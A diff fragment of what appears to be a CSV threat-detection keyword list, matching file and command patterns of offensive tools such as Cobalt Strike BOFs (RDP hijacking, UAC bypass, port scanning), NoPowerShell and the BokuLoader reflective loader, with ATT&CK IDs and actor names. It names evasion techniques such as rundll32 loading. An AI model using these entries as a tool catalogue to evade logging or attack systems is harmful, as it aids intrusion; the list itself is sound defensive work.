- T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*bofnet_execute.cpp.x86.obj*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*bofnet_execute.cpp.x64.obj*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*bofnet_execute.cpp.x86.obj*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" "*bofnet_init*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" "*bofnet_job *","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" "*bofnet_jobkill*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" @@ -7904,11 +8051,11 @@ "*bofnet_jobstatus *","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" "*bofnet_list*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" "*bofnet_listassembiles*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" -"*bofnet_load *","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*bofnet_load *","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" "*bofnet_load *.*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" "*bofnet_shutdown*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" "*BOFNET_Tests*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" -"*bofportscan *","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","0","N/A","10","10","480","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"*bofportscan *","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","0","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" "*bof-quser *.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/Quser-BOF","1","0","N/A","10","10","78","10","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z" "*bof-quser.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","10","10","78","10","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z" "*bof-rdphijack*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","10","3","257","39","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" @@ -7921,22 +8068,22 @@ "*bof-trustedpath-uacbypass*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file implementation for trusted path UAC bypass. The target executable will be called without involving cmd.exe by using DCOM object.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","104","33","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" "*boko.py *","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/bashexplode/boko","1","0","N/A","N/A","1","59","12","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" "*bokoscanner.*","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/bashexplode/boko","1","1","N/A","N/A","1","59","12","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" -"*boku_pe_customMZ*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" -"*boku_pe_customPE*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" -"*boku_pe_dll*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" -"*boku_pe_mask_*","offensive_tool_keyword","cobaltstrike","A 